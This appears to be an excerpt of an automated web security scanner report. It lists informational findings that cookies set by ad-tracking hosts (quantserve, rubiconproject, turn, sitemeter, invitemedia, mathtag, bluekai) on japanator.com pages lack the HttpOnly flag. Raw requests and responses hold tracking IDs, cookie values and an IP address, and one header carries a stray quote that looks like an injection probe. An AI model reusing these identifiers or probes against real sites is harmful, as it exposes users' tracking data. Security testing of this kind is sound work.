17.93. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=847987400;fpan=0;fpa=P0-1959175184-1304319359595;ns=0;url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml;ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico';ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304319368576;tzo=300;a=p-25XjRGUyZYjok HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGgAD-8kjVmtjIMAAZsBAdMGgZMAmtGCqVKLPR_BodpxqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQY5RAOiSABAshEiysQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=902031&id=1085044&id=1230047&t=2
Set-Cookie: d=ECwAD-8kjVmtjIMAAa0BAdMGgZMAmtGCqVKLPR_Bob88GbPRqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQd0cGoTRAOiSABAr4uGKGRiysQ; expires=Sun, 31-Jul-2011 01:56:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 02 May 2011 01:56:08 GMT
Server: QS

17.94. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=xy7kwd&next=http%3A%2F%2Fa.triggit.com%2Fpxruourcm HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:04:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C243%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Sat, 29-Oct-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Location: http://a.triggit.com/pxruourcm
Content-Length: 0
Content-Type: text/html; charset=UTF-8

17.95. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:38 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4222959636846101819&fpid=4&nu=n&t=
...[SNIP]...
17.96. http://s28.sitemeter.com/js/counter.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7266
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:32 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
17.97. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=79&partnerUID=1754bb650623c5be43fca0b57c3910d9&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID=eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjg0IjogWyJRNHpndm5Xczk5OXJUU2hCIiwgdHJ1ZV19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 01:56:24 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyI4NCI6IFsiUTR6Z3ZuV3M5OTlyVFNoQiIsIHRydWVdLCAiMTk5IjogWyJCREZCRkZDMjMxQTI4MkQ2RTI0NDVCOEU0REU0QTJFMCIsIHRydWVdLCAiNDgiOiBbIjYyMTA5NDcwNDc3ODYzMDAyNjgyODMzODQyNjQ4NTQ3MTIyODcwIiwgdHJ1ZV0sICI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 01-May-2012 01:56:44 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
17.98. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F684339%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sync.mathtag.com
Cookie: uuid=4d50384b-4b5e-0f67-919a-7275589c0b85; ts=1304302151

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71da 29146
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 02 May 2011 02:09:31 GMT
Location: http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85
Etag: 4d50384b-4b5e-0f67-919a-7275589c0b85
Connection: Keep-Alive
Set-Cookie: ts=1304302171; domain=.mathtag.com; path=/; expires=Tue, 01-May-2012 02:09:31 GMT
Content-Length: 0

17.99. http://tags.bluekai.com/site/2831  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2831

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2831?phint=zip=&phint=age=&phint=gender=&phint=segment=000 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
